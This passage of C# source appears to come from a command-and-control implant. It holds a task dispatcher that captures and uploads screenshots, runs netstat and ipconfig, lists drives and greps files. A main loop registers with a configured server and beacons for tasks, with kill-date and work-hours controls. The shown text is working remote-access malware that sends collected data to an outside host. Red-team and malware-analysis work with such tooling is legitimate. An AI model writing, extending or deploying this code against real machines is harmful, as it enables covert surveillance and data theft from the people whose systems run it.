                    var png = Screenshot.Capture();
                    _t.UploadFile(task.id, "screenshot.png", png);
                    result = string.Format("captured {0} bytes", png.Length);
                    break;
                }

                case "CLEANUP":
                    Environment.Exit(0);
                    break;

                case "KILL":
                    Environment.Exit(0);
                    break;

                case "DRIVES":
                {
                    var sb = new StringBuilder();
                    foreach (var d in DriveInfo.GetDrives())
                        try { sb.AppendLine(string.Format("{0} {1} {2:N0} free", d.Name, d.DriveType, d.AvailableFreeSpace)); }
                        catch { sb.AppendLine(d.Name); }
                    result = sb.ToString();
                    break;
                }

                case "NETSTAT":
                    result = RunShell("netstat -ano");
                    break;

                case "IPCONFIG":
                    result = RunShell("ipconfig /all");
                    break;

                case "DISPLAY":
                {
                    result = string.Format("{0}x{1}", Win32Helper.ScreenWidth(), Win32Helper.ScreenHeight());
                    break;
                }

                case "GREP":
                {
                    var parts = (task.args ?? "").Split(new[]{' '}, 2);
                    if (parts.Length < 2) { err = "usage: pattern path"; break; }
                    result = GrepFile(parts[0], parts[1]);
                    break;
                }

                case "DETECTED":
                    result = "acknowledged";
                    break;

                default:
                    err = "unsupported task type: " + task.type;
                    break;
            }
        }
        catch (Exception ex)
        {
            err = ex.Message;
        }
        _t.SendResult(task.id, result, err);
    }

    static string GrepFile(string pattern, string path)
    {
        try
        {
            var rx = new Regex(pattern);
            var sb = new StringBuilder();
            int n  = 0;
            foreach (var line in File.ReadLines(path))
            {
                n++;
                if (rx.IsMatch(line)) sb.AppendLine(n + ":" + line);
                if (sb.Length > 1024 * 1024) break;
            }
            return sb.ToString();
        }
        catch (Exception ex) { return "[!] " + ex.Message; }
    }
}

static class Win32Helper
{
    [DllImport("user32.dll")] static extern int GetSystemMetrics(int i);
    public static int ScreenWidth()  => GetSystemMetrics(0);
    public static int ScreenHeight() => GetSystemMetrics(1);
}

// ─── Entry point ─────────────────────────────────────────────────────────────

class Program
{
    [STAThread]
    static void Main(string[] args)
    {
        KillDateGuard.CheckExit();
        Guardrails.CheckExit();

        var transport  = new HttpTransport(Config.ServerURL);
        var commander  = new Commander(transport);
        var sysInfo    = SysInfo.Collect();
        int failCount  = 0;
        int maxRetry   = 0;
        int.TryParse(Config.MaxRetry, out maxRetry);

    outer:
        while (true)
        {
            // Registration loop
            while (!transport.Register(sysInfo))
            {
                failCount++;
                Thread.Sleep(Math.Min(30000, 2000 * failCount));
            }
            failCount = 0;

            // Beacon loop
            while (true)
            {
                KillDateGuard.CheckExit();

                if (!WorkHours.InWindow())
                {
                    WorkHours.SleepUntilWindow();
                    continue;
                }

                try
                {
                    var tasks = transport.Beacon();
                    if (tasks != null)
                    {
                        failCount = 0;
                        foreach (var task in tasks)
                            ThreadPool.QueueUserWorkItem(_ => commander.Dispatch(task));
                    }
                }
                catch (AgentUnknownException)
                {
                    goto outer; // re-register
                }
                catch
                {
                    failCount++;
                    if (maxRetry > 0 && failCount >= maxRetry) Environment.Exit(0);
                }

                Sleeper.Sleep();
            }
        }
    }
}
